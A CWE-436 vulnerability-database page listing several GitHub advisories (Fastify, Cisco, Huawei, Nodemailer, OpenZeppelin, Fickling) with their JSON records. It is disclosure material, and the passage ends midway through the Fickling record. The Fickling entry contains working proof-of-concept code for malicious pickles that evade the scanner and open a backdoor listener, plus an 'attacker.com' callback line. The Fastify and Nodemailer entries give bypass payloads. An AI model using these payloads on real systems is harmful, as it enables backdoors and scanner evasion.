Common Weakness Enumeration

CWE-436

Allowed-with-Review

Interpretation Conflict

Abstraction: Class · Status: Incomplete

Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.

199 vulnerabilities reference this CWE, most recent first.

GHSA-JX2C-RXCM-JVMQ

Vulnerability from github – Published: 2026-02-02 22:23 – Updated: 2026-02-04 17:46
VLAI
Summary
Fastify's Content-Type header tab character allows body validation bypass
Details

Impact

A validation bypass vulnerability exists in Fastify where request body validation schemas specified by Content-Type can be completely circumvented. By appending a tab character (\t) followed by arbitrary content to the Content-Type header, attackers can bypass body validation while the server still processes the body as the original content type.

For example, a request with Content-Type: application/json\ta will bypass JSON schema validation but still be parsed as JSON.

This vulnerability affects all Fastify users who rely on Content-Type-based body validation schemas to enforce data integrity or security constraints. The concrete impact depends on the handler implementation and the level of trust placed in the validated request body, but at the library level, this allows complete bypass of body validation for any handler using Content-Type-discriminated schemas.

This issue is a regression or missed edge case from the fix for a previously reported vulnerability.

Patches

This vulnerability has been patched in Fastify v5.7.2. All users should upgrade to this version or later immediately.

Workarounds

If upgrading is not immediately possible, user can implement a custom onRequest hook to reject requests containing tab characters in the Content-Type header:

fastify.addHook('onRequest', async (request, reply) => {
  const contentType = request.headers['content-type']
  if (contentType && contentType.includes('\t')) {
    reply.code(400).send({ error: 'Invalid Content-Type header' })
  }
})

Resources

  • https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272
  • https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125
  • Fastify Validation and Serialization Documentation
  • https://hackerone.com/reports/3464114
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fastify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25223"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T22:23:29Z",
    "nvd_published_at": "2026-02-03T22:16:31Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nA validation bypass vulnerability exists in Fastify where request body validation schemas specified by Content-Type can be completely circumvented. By appending a tab character (`\\t`) followed by arbitrary content to the Content-Type header, attackers can bypass body validation while the server still processes the body as the original content type.\n\nFor example, a request with `Content-Type: application/json\\ta` will bypass JSON schema validation but still be parsed as JSON.\n\nThis vulnerability affects all Fastify users who rely on Content-Type-based body validation schemas to enforce data integrity or security constraints. The concrete impact depends on the handler implementation and the level of trust placed in the validated request body, but at the library level, this allows complete bypass of body validation for any handler using Content-Type-discriminated schemas.\n\nThis issue is a regression or missed edge case from the fix for a previously reported vulnerability.\n\n### Patches\n\nThis vulnerability has been patched in **Fastify v5.7.2**. All users should upgrade to this version or later immediately.\n\n### Workarounds\n\nIf upgrading is not immediately possible, user can implement a custom `onRequest` hook to reject requests containing tab characters in the Content-Type header:\n\n```javascript\nfastify.addHook(\u0027onRequest\u0027, async (request, reply) =\u003e {\n  const contentType = request.headers[\u0027content-type\u0027]\n  if (contentType \u0026\u0026 contentType.includes(\u0027\\t\u0027)) {\n    reply.code(400).send({ error: \u0027Invalid Content-Type header\u0027 })\n  }\n})\n```\n\n### Resources\n\n- https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272\n- https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125\n- [Fastify Validation and Serialization Documentation](https://fastify.dev/docs/latest/Reference/Validation-and-Serialization/)\n- https://hackerone.com/reports/3464114",
  "id": "GHSA-jx2c-rxcm-jvmq",
  "modified": "2026-02-04T17:46:02Z",
  "published": "2026-02-02T22:23:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify/security/advisories/GHSA-jx2c-rxcm-jvmq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25223"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify/commit/32d7b6add39ddf082d92579a58bea7018c5ac821"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3464114"
    },
    {
      "type": "WEB",
      "url": "https://fastify.dev/docs/latest/Reference/Validation-and-Serialization"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fastify/fastify"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fastify\u0027s Content-Type header tab character allows body validation bypass"
}

GHSA-M29X-VP4P-2WVP

Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:51
VLAI
Details

A vulnerability in the Secure Shell (SSH) server code of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. The vulnerability is due to an internal state not being represented correctly in the SSH state machine, which leads to an unexpected behavior. An attacker could exploit this vulnerability by creating an SSH connection to an affected device and using a specific traffic pattern that causes an error condition within that connection. A successful exploit could allow an attacker to cause the device to reload, resulting in a denial of service (DoS) condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-3200"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-06-03T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the Secure Shell (SSH) server code of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. The vulnerability is due to an internal state not being represented correctly in the SSH state machine, which leads to an unexpected behavior. An attacker could exploit this vulnerability by creating an SSH connection to an affected device and using a specific traffic pattern that causes an error condition within that connection. A successful exploit could allow an attacker to cause the device to reload, resulting in a denial of service (DoS) condition.",
  "id": "GHSA-m29x-vp4p-2wvp",
  "modified": "2024-04-04T02:51:37Z",
  "published": "2022-05-24T17:19:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-3200"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ssh-dos-Un22sd2A"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MCPX-CG54-VWC7

Vulnerability from github – Published: 2023-06-16 15:30 – Updated: 2024-04-04 04:55
VLAI
Details

There is a misinterpretation of input vulnerability in Huawei Printer. Successful exploitation of this vulnerability may cause the printer service to be abnormal.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-48473"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-16T13:15:09Z",
    "severity": "HIGH"
  },
  "details": "There is a misinterpretation of input vulnerability in Huawei Printer. Successful exploitation of this vulnerability may cause the printer service to be abnormal.",
  "id": "GHSA-mcpx-cg54-vwc7",
  "modified": "2024-04-04T04:55:00Z",
  "published": "2023-06-16T15:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48473"
    },
    {
      "type": "WEB",
      "url": "https://https://www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-moivihp-2f201af9-en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MM7P-FCC7-PG87

Vulnerability from github – Published: 2025-10-07 13:42 – Updated: 2025-11-17 17:29
VLAI
Summary
Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Details

The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.

Payload: "xclow3n@gmail.com x"@internal.domain Using the following code to send mail

const nodemailer = require("nodemailer");

let transporter = nodemailer.createTransport({
  service: "gmail",
  auth: {
    user: "",
    pass: "",
  },
});

let mailOptions = {
  from: '"Test Sender" <your_email@gmail.com>', 
  to: "\"xclow3n@gmail.com x\"@internal.domain",
  subject: "Hello from Nodemailer",
  text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
    return console.log("Error: ", error);
  }
  console.log("Message sent: %s", info.messageId);

});


(async () => {
  const parser = await import("@sparser/email-address-parser");
  const { EmailAddress, ParsingOptions } = parser.default;
  const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);

  if (!parsed) {
    console.error("Invalid email address:", mailOptions.to);
    return;
  }

  console.log("Parsed email:", {
    address: `${parsed.localPart}@${parsed.domain}`,
    local: parsed.localPart,
    domain: parsed.domain,
  });
})();

Running the script and seeing how this mail is parsed according to RFC

Parsed email: {
  address: '"xclow3n@gmail.com x"@internal.domain',
  local: '"xclow3n@gmail.com x"',
  domain: 'internal.domain'
}

But the email is sent to xclow3n@gmail.com

Image

Impact:

  • Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.

  • Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.

  • Potential compliance issue: Violates RFC 5321/5322 parsing rules.

  • Domain based access control bypass in downstream applications using your library to send mails

Recommendations

  • Fix parser to correctly treat quoted local-parts per RFC 5321/5322.

  • Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nodemailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-13033"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-07T13:42:02Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.\n\nPayload: `\"xclow3n@gmail.com x\"@internal.domain`\nUsing the following code to send mail\n```\nconst nodemailer = require(\"nodemailer\");\n\nlet transporter = nodemailer.createTransport({\n  service: \"gmail\",\n  auth: {\n    user: \"\",\n    pass: \"\",\n  },\n});\n\nlet mailOptions = {\n  from: \u0027\"Test Sender\" \u003cyour_email@gmail.com\u003e\u0027, \n  to: \"\\\"xclow3n@gmail.com x\\\"@internal.domain\",\n  subject: \"Hello from Nodemailer\",\n  text: \"This is a test email sent using Gmail SMTP and Nodemailer!\",\n};\n\ntransporter.sendMail(mailOptions, (error, info) =\u003e {\n  if (error) {\n    return console.log(\"Error: \", error);\n  }\n  console.log(\"Message sent: %s\", info.messageId);\n\n});\n\n\n(async () =\u003e {\n  const parser = await import(\"@sparser/email-address-parser\");\n  const { EmailAddress, ParsingOptions } = parser.default;\n  const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);\n\n  if (!parsed) {\n    console.error(\"Invalid email address:\", mailOptions.to);\n    return;\n  }\n\n  console.log(\"Parsed email:\", {\n    address: `${parsed.localPart}@${parsed.domain}`,\n    local: parsed.localPart,\n    domain: parsed.domain,\n  });\n})();\n```\n\nRunning the script and seeing how this mail is parsed according to RFC\n\n```\nParsed email: {\n  address: \u0027\"xclow3n@gmail.com x\"@internal.domain\u0027,\n  local: \u0027\"xclow3n@gmail.com x\"\u0027,\n  domain: \u0027internal.domain\u0027\n}\n```\n\nBut the email is sent to `xclow3n@gmail.com`\n\n\u003cimg width=\"2128\" height=\"439\" alt=\"Image\" src=\"https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d\" /\u003e\n\n\n### Impact:\n\n-    Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.\n\n-    Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.\n\n-    Potential compliance issue: Violates RFC 5321/5322 parsing rules.\n\n-    Domain based access control bypass in downstream applications using your library to send mails\n\n### Recommendations\n\n-    Fix parser to correctly treat quoted local-parts per RFC 5321/5322.\n\n-    Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.",
  "id": "GHSA-mm7p-fcc7-pg87",
  "modified": "2025-11-17T17:29:26Z",
  "published": "2025-10-07T13:42:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-13033"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodemailer/nodemailer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict"
}

GHSA-MX2Q-35M2-X2RH

Vulnerability from github – Published: 2023-04-17 16:45 – Updated: 2023-04-18 16:14
VLAI
Summary
OpenZeppelin Contracts TransparentUpgradeableProxy clashing selector calls may not be delegated
Details

Impact

A function in the implementation contract may be inaccessible if its selector clashes with one of the proxy's own selectors. Specifically, if the clashing function has a different signature with incompatible ABI encoding, the proxy could revert while attempting to decode the arguments from calldata.

The probability of an accidental clash is negligible, but one could be caused deliberately.

Patches

The issue has been fixed in v4.8.3.

Workarounds

If a function appears to be inaccessible for this reason, it may be possible to craft the calldata such that ABI decoding does not fail at the proxy and the function is properly proxied through.

References

https://github.com/OpenZeppelin/openzeppelin-contracts/pull/4154

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@openzeppelin/contracts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "4.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@openzeppelin/contracts-upgradeable"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "4.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-30541"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-04-17T16:45:21Z",
    "nvd_published_at": "2023-04-17T22:15:10Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nA function in the implementation contract may be inaccessible if its selector clashes with one of the proxy\u0027s own selectors. Specifically, if the clashing function has a different signature with incompatible ABI encoding, the proxy could revert while attempting to decode the arguments from calldata.\n\nThe probability of an accidental clash is negligible, but one could be caused deliberately.\n\n### Patches\n\nThe issue has been fixed in v4.8.3.\n\n### Workarounds\n\nIf a function appears to be inaccessible for this reason, it may be possible to craft the calldata such that ABI decoding does not fail at the proxy and the function is properly proxied through.\n\n### References\n\nhttps://github.com/OpenZeppelin/openzeppelin-contracts/pull/4154\n",
  "id": "GHSA-mx2q-35m2-x2rh",
  "modified": "2023-04-18T16:14:52Z",
  "published": "2023-04-17T16:45:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-mx2q-35m2-x2rh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30541"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/openzeppelin-contracts/pull/4154"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/58fa0f81c4036f1a3b616fdffad2fd27e5d5ce21"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenZeppelin/openzeppelin-contracts"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.8.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenZeppelin Contracts TransparentUpgradeableProxy clashing selector calls may not be delegated"
}

GHSA-MXHJ-88FX-4PCV

Vulnerability from github – Published: 2026-02-24 21:41 – Updated: 2026-02-24 21:41
VLAI
Summary
Fickling: OBJ opcode call invisibility bypasses all safety checks
Details

Assessment

The interpreter so it behaves closer to CPython when dealing with OBJ, NEWOBJ, and NEWOBJ_EX opcodes (https://github.com/trailofbits/fickling/commit/ff423dade2bb1f72b2b48586c022fac40cbd9a4a).

Original report

Summary

All 5 of fickling's safety interfaces -- is_likely_safe(), check_safety(), CLI --check-safety, always_check_safety(), and the check_safety() context manager -- report LIKELY_SAFE / raise no exceptions for pickle files that use the OBJ opcode to call dangerous stdlib functions (signal handlers, network servers, network connections, file operations). The OBJ opcode's implementation in fickling pushes function calls directly onto the interpreter stack without persisting them to the AST via new_variable(). When the result is discarded with POP, the call vanishes from the final AST entirely, making it invisible to all 9 analysis passes.

This is a separate vulnerability from the REDUCE+BUILD bypass, with a different root cause. It survives all three proposed fixes for the REDUCE+BUILD vulnerability.

Details

The vulnerability is a single missing new_variable() call in Obj.run() (fickle.py:1333-1350).

REDUCE (fickle.py:1286-1301) correctly persists calls to the AST:

# Line 1300: call IS saved to module_body
var_name = interpreter.new_variable(call)
interpreter.stack.append(ast.Name(var_name, ast.Load()))

The comment on lines 1296-1299 explicitly states: "if we just save it to the stack, then it might not make it to the final AST unless the stack value is actually used."

OBJ (fickle.py:1333-1350) does exactly what that comment warns against:

# Line 1348: call is ONLY on the stack, NOT in module_body
interpreter.stack.append(ast.Call(kls, args, []))

When the OBJ result is discarded by POP, the ast.Call is gone. The decompiled AST shows the import but no function call:

from smtplib import SMTP    # import present (from STACK_GLOBAL)
result = None              # no call to SMTP visible

Yet at runtime, SMTP('127.0.0.1') executes and opens a TCP connection.

NEWOBJ (fickle.py:1411-1420) and NEWOBJ_EX (fickle.py:1423-1433) have the same code pattern but are less exploitable since CPython's NEWOBJ calls cls.__new__() (allocation only) while OBJ calls cls(*args) (full constructor execution with __init__ side effects).

Affected versions

All versions through 0.1.7 (latest as of 2026-02-19).

Affected APIs

  • fickling.is_likely_safe() - returns True for bypass payloads
  • fickling.analysis.check_safety() - returns AnalysisResults with severity = Severity.LIKELY_SAFE
  • fickling --check-safety CLI - exits with code 0
  • fickling.always_check_safety() + pickle.load() - no UnsafeFileError raised, malicious code executes
  • fickling.check_safety() context manager + pickle.load() - no UnsafeFileError raised, malicious code executes

PoC

A pickle that opens a TCP connection to an attacker's server via OBJ+POP, yet fickling reports it as LIKELY_SAFE:

import io, struct

def sbu(s):
    """SHORT_BINUNICODE opcode helper."""
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

def make_obj_pop_bypass():
    """
    Pickle that calls smtplib.SMTP('127.0.0.1') at runtime,
    but the call is invisible to fickling.

    Opcode sequence:
        MARK
          STACK_GLOBAL 'smtplib' 'SMTP'   (import persisted to AST)
          SHORT_BINUNICODE '127.0.0.1'    (argument)
        OBJ                               (call SMTP('127.0.0.1'), push result)
                                          (ast.Call on stack only, NOT in AST)
        POP                               (discard result -> call GONE)
        NONE
        STOP
    """
    buf = io.BytesIO()
    buf.write(b"\x80\x04\x95")  # PROTO 4 + FRAME

    payload = io.BytesIO()
    payload.write(b"(")                              # MARK
    payload.write(sbu("smtplib") + sbu("SMTP"))      # push module + func strings
    payload.write(b"\x93")                            # STACK_GLOBAL
    payload.write(sbu("127.0.0.1"))                   # push argument
    payload.write(b"o")                               # OBJ: call SMTP('127.0.0.1')
    payload.write(b"0")                               # POP: discard result
    payload.write(b"N.")                              # NONE + STOP

    frame_data = payload.getvalue()
    buf.write(struct.pack("<Q", len(frame_data)))
    buf.write(frame_data)
    return buf.getvalue()

import fickling, tempfile, os
data = make_obj_pop_bypass()
path = os.path.join(tempfile.mkdtemp(), "bypass.pkl")
with open(path, "wb") as f:
    f.write(data)

print(fickling.is_likely_safe(path))
# Output: True  <-- BYPASSED (network connection invisible to fickling)

fickling decompiles this to:

from smtplib import SMTP
result = None

Yet at runtime, SMTP('127.0.0.1') executes and opens a TCP connection.

CLI verification:

$ fickling --check-safety bypass.pkl; echo "EXIT: $?"
EXIT: 0    # BYPASSED

Comparison with REDUCE (same function, detected):

$ fickling --check-safety reduce_smtp.pkl; echo "EXIT: $?"
Warning: Fickling detected that the pickle file may be unsafe.
EXIT: 1    # DETECTED

Backdoor listener PoC (most impactful)

A pickle that opens a TCP listener on port 9999, binding to all interfaces:

import io, struct

def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

def binint(n):
    return b"J" + struct.pack("<i", n)

def make_backdoor():
    buf = io.BytesIO()
    buf.write(b"\x80\x04\x95")  # PROTO 4 + FRAME

    payload = io.BytesIO()
    # OBJ+POP: TCPServer(('0.0.0.0', 9999), BaseRequestHandler)
    payload.write(b"(")                                          # MARK
    payload.write(sbu("socketserver") + sbu("TCPServer") + b"\x93")  # STACK_GLOBAL
    payload.write(b"(")                                          # MARK (inner tuple)
    payload.write(sbu("0.0.0.0"))                                # host
    payload.write(binint(9999))                                  # port
    payload.write(b"t")                                          # TUPLE
    payload.write(sbu("socketserver") + sbu("BaseRequestHandler") + b"\x93")  # handler
    payload.write(b"o")                                          # OBJ
    payload.write(b"0")                                          # POP
    payload.write(b"N.")                                         # NONE + STOP

    frame_data = payload.getvalue()
    buf.write(struct.pack("<Q", len(frame_data)))
    buf.write(frame_data)
    return buf.getvalue()

import fickling
data = make_backdoor()
with open("/tmp/backdoor.pkl", "wb") as f:
    f.write(data)

print(fickling.is_likely_safe("/tmp/backdoor.pkl"))
# Output: True  <-- BYPASSED

import pickle, socket
server = pickle.loads(data)
# Port 9999 is now LISTENING on all interfaces

s = socket.socket()
s.connect(("127.0.0.1", 9999))
print("Connected to backdoor port!")  # succeeds
s.close()
server.server_close()

Multi-stage combined PoC

A single pickle combining signal suppression + backdoor listener + outbound callback + file persistence:

# All four operations in one pickle, all invisible to fickling:
# 1. signal.signal(SIGTERM, SIG_IGN) - suppress graceful shutdown
# 2. socketserver.TCPServer(('0.0.0.0', 9999), BaseRequestHandler) - backdoor
# 3. smtplib.SMTP('attacker.com') - C2 callback
# 4. sqlite3.connect('/tmp/.marker') - persistence marker

# fickling reports: LIKELY_SAFE
# All 4 operations execute at runtime

always_check_safety() verification:

import fickling, pickle

fickling.always_check_safety()
with open("poc_obj_multi.pkl", "rb") as f:
    result = pickle.load(f)
# No UnsafeFileError raised -- all 4 malicious operations executed

Impact

An attacker can distribute a malicious pickle file (e.g., a backdoored ML model) that passes all fickling safety checks. Demonstrated impacts:

  • Backdoor network listener: socketserver.TCPServer(('0.0.0.0', 9999), BaseRequestHandler) opens a port on all interfaces. The TCPServer constructor calls server_bind() and server_activate(), so the port is open immediately after pickle.loads() returns.
  • Process persistence: signal.signal(SIGTERM, SIG_IGN) makes the process ignore SIGTERM. In Kubernetes/Docker/ECS, the backdoor stays alive for 30+ seconds per restart attempt.
  • Outbound exfiltration: smtplib.SMTP('attacker.com') opens an outbound TCP connection. The attacker's server learns the victim's IP and hostname.
  • File creation on disk: sqlite3.connect(path) creates a file at an attacker-chosen path.

A single pickle combines all operations. In cloud ML environments, this enables persistent backdoor access while resisting graceful shutdown. This affects any application using fickling as a safety gate for ML model files.

The bypass works for any stdlib module NOT in fickling's UNSAFE_IMPORTS blocklist. Blocked modules (os, subprocess, socket, builtins, etc.) are still detected at the import level.

Suggested Fix

Add new_variable() to Obj.run() (lines 1348 and 1350), applying the same pattern used by Reduce.run() (line 1300):

# fickle.py, Obj.run():
-       if args or hasattr(kls, "__getinitargs__") or not isinstance(kls, type):
-           interpreter.stack.append(ast.Call(kls, args, []))
-       else:
-           interpreter.stack.append(ast.Call(kls, kls, []))
+       if args or hasattr(kls, "__getinitargs__") or not isinstance(kls, type):
+           call = ast.Call(kls, args, [])
+       else:
+           call = ast.Call(kls, kls, [])
+       var_name = interpreter.new_variable(call)
+       interpreter.stack.append(ast.Name(var_name, ast.Load()))

Also apply to NewObj.run() (line 1414) and NewObjEx.run() (line 1426) for defense in depth.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T21:41:31Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Assessment\n\nThe interpreter so it behaves closer to CPython when dealing with `OBJ`, `NEWOBJ`, and `NEWOBJ_EX` opcodes (https://github.com/trailofbits/fickling/commit/ff423dade2bb1f72b2b48586c022fac40cbd9a4a).\n\n# Original report\n\n## Summary\n\nAll 5 of fickling\u0027s safety interfaces -- `is_likely_safe()`, `check_safety()`, CLI `--check-safety`, `always_check_safety()`, and the `check_safety()` context manager -- report `LIKELY_SAFE` / raise no exceptions for pickle files that use the OBJ opcode to call dangerous stdlib functions (signal handlers, network servers, network connections, file operations). The OBJ opcode\u0027s implementation in fickling pushes function calls directly onto the interpreter stack without persisting them to the AST via `new_variable()`. When the result is discarded with POP, the call vanishes from the final AST entirely, making it invisible to all 9 analysis passes.\n\nThis is a separate vulnerability from the REDUCE+BUILD bypass, with a different root cause. It survives all three proposed fixes for the REDUCE+BUILD vulnerability.\n\n## Details\n\nThe vulnerability is a single missing `new_variable()` call in `Obj.run()` (`fickle.py:1333-1350`).\n\n**REDUCE** (`fickle.py:1286-1301`) correctly persists calls to the AST:\n```python\n# Line 1300: call IS saved to module_body\nvar_name = interpreter.new_variable(call)\ninterpreter.stack.append(ast.Name(var_name, ast.Load()))\n```\n\nThe comment on lines 1296-1299 explicitly states: \"if we just save it to the stack, then it might not make it to the final AST unless the stack value is actually used.\"\n\n**OBJ** (`fickle.py:1333-1350`) does exactly what that comment warns against:\n```python\n# Line 1348: call is ONLY on the stack, NOT in module_body\ninterpreter.stack.append(ast.Call(kls, args, []))\n```\n\nWhen the OBJ result is discarded by POP, the `ast.Call` is gone. The decompiled AST shows the import but no function call:\n```python\nfrom smtplib import SMTP    # import present (from STACK_GLOBAL)\nresult = None              # no call to SMTP visible\n```\n\nYet at runtime, `SMTP(\u0027127.0.0.1\u0027)` executes and opens a TCP connection.\n\n**NEWOBJ** (`fickle.py:1411-1420`) and **NEWOBJ_EX** (`fickle.py:1423-1433`) have the same code pattern but are less exploitable since CPython\u0027s NEWOBJ calls `cls.__new__()` (allocation only) while OBJ calls `cls(*args)` (full constructor execution with `__init__` side effects).\n\n### Affected versions\n\nAll versions through 0.1.7 (latest as of 2026-02-19).\n\n### Affected APIs\n\n- `fickling.is_likely_safe()` - returns `True` for bypass payloads\n- `fickling.analysis.check_safety()` - returns `AnalysisResults` with `severity = Severity.LIKELY_SAFE`\n- `fickling --check-safety` CLI - exits with code 0\n- `fickling.always_check_safety()` + `pickle.load()` - no `UnsafeFileError` raised, malicious code executes\n- `fickling.check_safety()` context manager + `pickle.load()` - no `UnsafeFileError` raised, malicious code executes\n\n## PoC\n\nA pickle that opens a TCP connection to an attacker\u0027s server via OBJ+POP, yet fickling reports it as `LIKELY_SAFE`:\n\n```python\nimport io, struct\n\ndef sbu(s):\n    \"\"\"SHORT_BINUNICODE opcode helper.\"\"\"\n    b = s.encode()\n    return b\"\\x8c\" + struct.pack(\"\u003cB\", len(b)) + b\n\ndef make_obj_pop_bypass():\n    \"\"\"\n    Pickle that calls smtplib.SMTP(\u0027127.0.0.1\u0027) at runtime,\n    but the call is invisible to fickling.\n\n    Opcode sequence:\n        MARK\n          STACK_GLOBAL \u0027smtplib\u0027 \u0027SMTP\u0027   (import persisted to AST)\n          SHORT_BINUNICODE \u0027127.0.0.1\u0027    (argument)\n        OBJ                               (call SMTP(\u0027127.0.0.1\u0027), push result)\n                                          (ast.Call on stack only, NOT in AST)\n        POP                               (discard result -\u003e call GONE)\n        NONE\n        STOP\n    \"\"\"\n    buf = io.BytesIO()\n    buf.write(b\"\\x80\\x04\\x95\")  # PROTO 4 + FRAME\n\n    payload = io.BytesIO()\n    payload.write(b\"(\")                              # MARK\n    payload.write(sbu(\"smtplib\") + sbu(\"SMTP\"))      # push module + func strings\n    payload.write(b\"\\x93\")                            # STACK_GLOBAL\n    